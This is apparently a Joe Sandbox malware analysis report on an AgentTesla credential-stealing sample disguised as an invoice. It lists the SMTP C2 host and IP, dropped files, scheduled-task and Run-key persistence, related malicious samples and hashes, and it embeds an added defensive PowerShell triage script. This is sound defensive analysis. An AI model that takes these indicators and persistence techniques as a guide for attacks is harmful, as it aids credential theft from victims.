http://www.sakkal.com | 0% | URL Reputation | safe
http://mail.unitechautomations.com | 0% | Avira URL Cloud | safe
http://tempuri.org/DataSet1.xsd | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | Avira URL Cloud | safe
http://www.zhongyicts.com.cn | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | Virustotal |
http://mail.unitechautomations.com | 1% | Virustotal |
http://tempuri.org/DataSet1.xsd | 2% | Virustotal |
http://www.founder.com.cn/cn | 0% | Virustotal |
http://www.founder.com.cn/cn/cThe | 0% | Virustotal |
http://www.zhongyicts.com.cn | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.unitechautomations.com | 192.185.129.60 | true | true | | unknown
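The indicators in this report (dWXyZYb.exe and GUIVTme.exe dropped under %APPDATA%, a Windows Defender directory exclusion, a task registered through schtasks.exe from a temp XML file, and a connection from the injected RegSvcs.exe to mail.unitechautomations.com at 192.185.129.60 on port 587, the SMTP submission port) map directly onto a host triage check. The script below is an added example written for this page; it is not part of the Joe Sandbox output or of any tool the report names. The paths, host and IP are taken from the report; the function name Test-AgentTeslaArtefacts, the $Iocs table and the heuristic that flags any scheduled task whose action lives under \AppData\ are the editor's own assumptions, because the report does not give the task name.

```powershell
# Added host triage example for the artefacts listed in this report (not part of
# the Joe Sandbox output). Paths, host and IP come from the report; the function
# name, the $Iocs table and the AppData task heuristic are the editor's assumptions.

$Iocs = @{
    Files  = @("$env:APPDATA\dWXyZYb.exe", "$env:APPDATA\GUIVTme\GUIVTme.exe")  # dropped copies
    C2Host = 'mail.unitechautomations.com'                                     # SMTP host in the report
    C2Ip   = '192.185.129.60'
    C2Port = 587                                                               # SMTP submission
}

function Test-AgentTeslaArtefacts {
    $findings = [System.Collections.Generic.List[object]]::new()

    # 1. Dropped executables under %APPDATA%, with their hash and whether a
    #    Zone.Identifier stream is present (the report says the sample strips it).
    foreach ($p in $Iocs.Files) {
        if (Test-Path -LiteralPath $p) {
            $hash = (Get-FileHash -LiteralPath $p -Algorithm SHA256).Hash.ToLower()
            $motw = [bool](Get-Item -LiteralPath $p -Stream Zone.Identifier -ErrorAction SilentlyContinue)
            $findings.Add([pscustomobject]@{ Type = 'File'; Detail = "$p sha256=$hash zone.identifier=$motw" })
        }
    }

    # 2. Defender path exclusions: the dropper adds a directory exclusion, so every
    #    exclusion is listed for review, not only ones under the user profile.
    foreach ($e in (Get-MpPreference).ExclusionPath) {
        $findings.Add([pscustomobject]@{ Type = 'DefenderExclusion'; Detail = $e })
    }

    # 3. Scheduled tasks whose action launches something from AppData
    #    (heuristic; the report shows schtasks.exe registering a task from a temp XML).
    foreach ($t in Get-ScheduledTask) {
        foreach ($a in $t.Actions) {
            if ($a.Execute -and $a.Execute -match '\\AppData\\') {
                $findings.Add([pscustomobject]@{ Type = 'ScheduledTask'; Detail = "$($t.TaskPath)$($t.TaskName) -> $($a.Execute) $($a.Arguments)" })
            }
        }
    }

    # 4. Live connections to the reported C2 (RegSvcs.exe -> 192.185.129.60:587) and
    #    the DNS client cache, which keeps the name after the socket has closed.
    $conns = Get-NetTCPConnection -RemoteAddress $Iocs.C2Ip -RemotePort $Iocs.C2Port -ErrorAction SilentlyContinue
    foreach ($c in $conns) {
        $proc = (Get-Process -Id $c.OwningProcess -ErrorAction SilentlyContinue).ProcessName
        $findings.Add([pscustomobject]@{ Type = 'Network'; Detail = "$proc (pid $($c.OwningProcess)) -> $($c.RemoteAddress):$($c.RemotePort) $($c.State)" })
    }
    if (Get-DnsClientCache -Entry $Iocs.C2Host -ErrorAction SilentlyContinue) {
        $findings.Add([pscustomobject]@{ Type = 'DnsCache'; Detail = $Iocs.C2Host })
    }

    return $findings
}

Test-AgentTeslaArtefacts | Format-Table -AutoSize
```

Run it in an elevated PowerShell session on the suspect host; Get-MpPreference and Get-ScheduledTask need the Defender and ScheduledTasks modules that ship with Windows 10. An empty result only means none of these specific artefacts are present now; the report's own findings (credential files opened, Yara hits in RegSvcs.exe memory) are the reason to also collect memory and the SMTP traffic if any of the checks fire.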
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://account.dyn.com/ | Total Invoices.exe, 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, dWXyZYb.exe, 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/DataSet1.xsd | Total Invoices.exe, dWXyZYb.exe.0.dr | false | 2% Virustotal; Avira URL Cloud: safe | unknown
http://mail.unitechautomations.com | RegSvcs.exe, 00000008.00000002.1804990629.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2882242292.0000000002899000.00000004.00000800.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
http://www.tiro.com | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Total Invoices.exe, 00000000.00000002.1735865381.0000000005B39000.00000004.00000020.00020000.00000000.sdmp, Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmp | false |

Reading the table: the font-foundry addresses (fontbureau.com, tiro.com, goodfont.co.kr, carterandcone.com, sajatypeworks.com, typography.net, galapagosdesign.com, jiyu-kobo.co.jp, founder.com.cn and the like) all come from one memory region of Total Invoices.exe (the 072E2000 dump) and are vendor and copyright strings carried inside font files loaded by the process; they are not indicators for this sample. http://tempuri.org/DataSet1.xsd is the default namespace Visual Studio assigns to a typed DataSet and only tells you the binary was built from a .NET project. The entries that belong to the malware itself are mail.unitechautomations.com, present in the memory of both RegSvcs.exe instances (the process that opens the port 587 connection in the behavior graph), and https://account.dyn.com/, which sits in exactly the Total Invoices.exe, RegSvcs.exe and dWXyZYb.exe memory regions that the Yara rules matched in the sections above.
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/DPleaseTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers8Total Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fonts.comTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.sandoll.co.krTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleaseTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTotal Invoices.exe, 00000000.00000002.1730336857.000000000335C000.00000004.00000800.00020000.00000000.sdmp, dWXyZYb.exe, 00000009.00000002.1825169792.0000000002FF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.sakkal.comTotal Invoices.exe, 00000000.00000002.1736066649.00000000072E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
192.185.129.60 | mail.unitechautomations.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430700
Start date and time: 2024-04-24 03:16:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Total Invoices.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@23/19@1/1
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 129
                                              • Number of non-executed functions: 13
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target GUIVTme.exe, PID 7224 because it is empty
                                              • Execution Graph export aborted for target GUIVTme.exe, PID 7964 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:17:02 | Task Scheduler | Run new task: dWXyZYb path: C:\Users\user\AppData\Roaming\dWXyZYb.exe
02:17:05 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
02:17:13 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run GUIVTme C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
03:16:56 | API Interceptor | 1x Sleep call for process: Total Invoices.exe modified
03:17:02 | API Interceptor | 29x Sleep call for process: powershell.exe modified
03:17:03 | API Interceptor | 37x Sleep call for process: RegSvcs.exe modified
03:17:04 | API Interceptor | 1x Sleep call for process: dWXyZYb.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
Match: 192.185.129.60
  CAHKHCM2404009CFS.exe | malicious | AgentTesla
  Booking_BK24-000288_19_Apr_2410_52_34 AM.exe | malicious | AgentTesla
  HBL.exe | malicious | AgentTesla
  DHL-102113XXX.pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine
  DHL-100122XXXXXX.pdf.exe | malicious | AgentTesla, PureLog Stealer, RedLine
  003035044445.AWB.PRG.CHO.M20.20231124.003622.20231124.004549.10532.exe | malicious | AgentTesla
  SOB_BK23-003618_25.exe | malicious | AgentTesla
  SOB_BK23-003618_25_Nov_23_1_39_30_PM.exe | malicious | AgentTesla
  ordref_bomyogeshd_20112023165922.exe | malicious | AgentTesla
  Outstanding_Invoices.exe | malicious | AgentTesla
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: mail.unitechautomations.com
  CAHKHCM2404009CFS.exe | malicious | AgentTesla | context: 192.185.129.60
  Booking_BK24-000288_19_Apr_2410_52_34 AM.exe | malicious | AgentTesla | context: 192.185.129.60
  HBL.exe | malicious | AgentTesla | context: 192.185.129.60
  003035044445.AWB.PRG.CHO.M20.20231124.003622.20231124.004549.10532.exe | malicious | AgentTesla | context: 192.185.129.60
  SOB_BK23-003618_25.exe | malicious | AgentTesla | context: 192.185.129.60
  SOB_BK23-003618_25_Nov_23_1_39_30_PM.exe | malicious | AgentTesla | context: 192.185.129.60
  ordref_bomyogeshd_20112023165922.exe | malicious | AgentTesla | context: 192.185.129.60
  Outstanding_Invoices.exe | malicious | AgentTesla | context: 192.185.129.60
  ATTACHED_INVOICES.exe | malicious | AgentTesla | context: 192.185.129.60
  SOA_SEP.OCT.NOV.exe | malicious | AgentTesla | context: 192.185.129.60
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: UNIFIEDLAYER-AS-1US
  knfV5IVjEV.lnk | malicious | Unknown | context: 162.241.216.65
  http://www.noahsarkademy.com | malicious | Unknown | context: 69.49.230.31
  CR-FEDEX_TN-775720741041.vbs | malicious | AgentTesla, GuLoader | context: 192.185.13.234
  Wire Transfer Payment Receipt#2024-22-04.exe | malicious | AgentTesla | context: 162.144.15.164
  DHL_RF_20200712_BN_OTN 0095673441.vbs | malicious | AgentTesla, GuLoader | context: 192.185.13.234
  https://c8rzg8yq.r.us-east-1.awstrack.me/L0/https:%2F%2Fimaot.co.il%2FContentArea%2FBannerClick%3FBannerId=437%26BannerType=CookbookBanner%26ContentAreaId=74%26SiteUrl=mexperiencia.com%2Felvisa%2F451c858f52d4a1deb2b006143366fdc7%2F6VrgwA%2FcnRpdUB6ZW5kZXNrLmNvbQ==/1/0100018ef745f143-c3ec9f00-7fd4-48c1-9788-f0017cd20054-000000/By5Tv4iHSsE-ml_PGFCkji_Ea6g=370 | malicious | Unknown | context: 162.241.225.201
  DHL INVOICE.scr.exe | malicious | AgentTesla | context: 192.185.171.184
  PO No. 2430800015.exe | malicious | AgentTesla | context: 162.241.225.141
  DHL_RF_20200712_BN_N0095673441.vbs | malicious | AgentTesla, GuLoader | context: 192.185.13.234
  CR-FEDEX_TN-775537409198_Doc.vbs | malicious | Unknown | context: 192.185.84.89
                                                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name
Match: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
  BARSYL SHIPPING Co (VIETNAM).exe | malicious | AgentTesla
  BARSYL SHIPPING Co (VIETNAM).exe | malicious | AgentTesla
  Urgent PO 18-3081 Confirmation.exe | malicious | AgentTesla
  CAHKHCM2404009CFS.exe | malicious | AgentTesla
  FAR.N_2430-240009934.exe | malicious | AgentTesla
  TT copy of the first payment.exe | malicious | AgentTesla
  Booking_BK24-000288_19_Apr_2410_52_34 AM.exe | malicious | AgentTesla
  charesworh.exe | malicious | AgentTesla
  FAR.N_2430-240009934.exe | malicious | AgentTesla
  FAR.N#U00b02430-24000993.exe | malicious | AgentTesla
                                                                                      Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):142
                                                                                      Entropy (8bit):5.090621108356562
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                                      MD5:8C0458BB9EA02D50565175E38D577E35
                                                                                      SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                                      SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                                      SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                      Process:C:\Users\user\Desktop\Total Invoices.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.34331486778365
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                      Process:C:\Users\user\AppData\Roaming\dWXyZYb.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1216
                                                                                      Entropy (8bit):5.34331486778365
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2232
                                                                                      Entropy (8bit):5.380285623575084
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:+WSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZUUyus:+LHxvCsIfA2KRHmOugms
                                                                                      MD5:09598582CEE9801F213404AB48FF6113
                                                                                      SHA1:0DFF1B5BA250A973855BF0AA442C2DE61AE7E7AF
                                                                                      SHA-256:C7D34FF91DD7D1DFDE5883D125E853A57DC4EF8F0C22254B58EE38F61DA322B4
                                                                                      SHA-512:FB4936B8483006CA442438D1A02D928CE48A3378693DA712BA17E416405DD39343CA1F78A3BD154A45CACF6EECC04EC449BD5C74245E82F14FB00E6EE72C24FE
                                                                                      Malicious:false
                                                                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Users\user\Desktop\Total Invoices.exe
                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):1573
                                                                                      Entropy (8bit):5.117699305067449
                                                                                      Encrypted:false
